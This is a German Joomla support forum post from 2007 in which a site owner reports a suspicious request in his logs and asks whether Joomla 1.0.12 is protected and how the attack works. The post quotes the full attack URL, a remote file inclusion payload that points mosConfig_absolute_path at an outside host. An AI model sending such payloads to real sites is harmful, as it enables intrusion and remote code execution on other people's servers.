Erweiterungen & Templates für Joomla     Support Chat     JoomlaJobs    

   

 

Zurück   Joomla CMS Support Forum > Joomla 1.0x > Sicherheit
Benutzername
Kennwort
Antwort
 
LinkBack Themen-Optionen Thema durchsuchen Ansicht

  #1 (permalink)
Alt 28.04.2007, 10:54
Joomlaking
 
Benutzerbild von calimero
 
Registriert seit: 12.12.2005
Ort: Würzburg
Beiträge: 516
Bedankte sich: 45
58 Danksagungen in 52 Beiträgen
calimero eine Nachricht über Skype™ schicken
Standard mosConfig_absolute_path Attacke?

Hallo Leute,

ich habe in einer Joomla Installation in der nicht soo viele Seitenaufrufe sind, mal in JoomlaStats die Seitenaufrufe angesehen, weil ich nach was bestimmtem gesucht habe.

Und habe voll Entsetzen folgendes gesehen:

http://www.domain.de/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xboxchannel.narod.ru/main.txt?


Ich habe jetzt hier im Sicherheitsforum etwas nach gelesen bin mir aber über folgende Fragen nicht sicher.


1. Ist Joomla 1.0.12 gegen solche Attacken sicher?
Falls ja, welche früheren Versionen hätten mit der Attacke Probleme?

2. Wie funktioniert obige Attacke? Sind damit eventuelll 3th Party Komponenten unsicher? wie ich das sehe geht die Attacke ja direkt auf com_content, also Joomla Core. Oder?

Danke!
__________________
Gruß Theo

-------
www.Dein-Franken.de - Dein Franken, das Infoportal für Freizeit und Tourismus
www.Franken-Bilderbuch.de - Das fränkische Bilderbuch mit den schönsten Seiten Frankens!
calimero ist offline   Mit Zitat antworten
Werbung
Antwort


Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht




Alle Zeitangaben in WEZ +2. Es ist jetzt 20:11 Uhr.

Powered by vBulletin Version 3.6.2 (Deutsch)
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.3.2
vBulletin Style by: vbdesigns.de
Copyright 2005 by Stefan Köller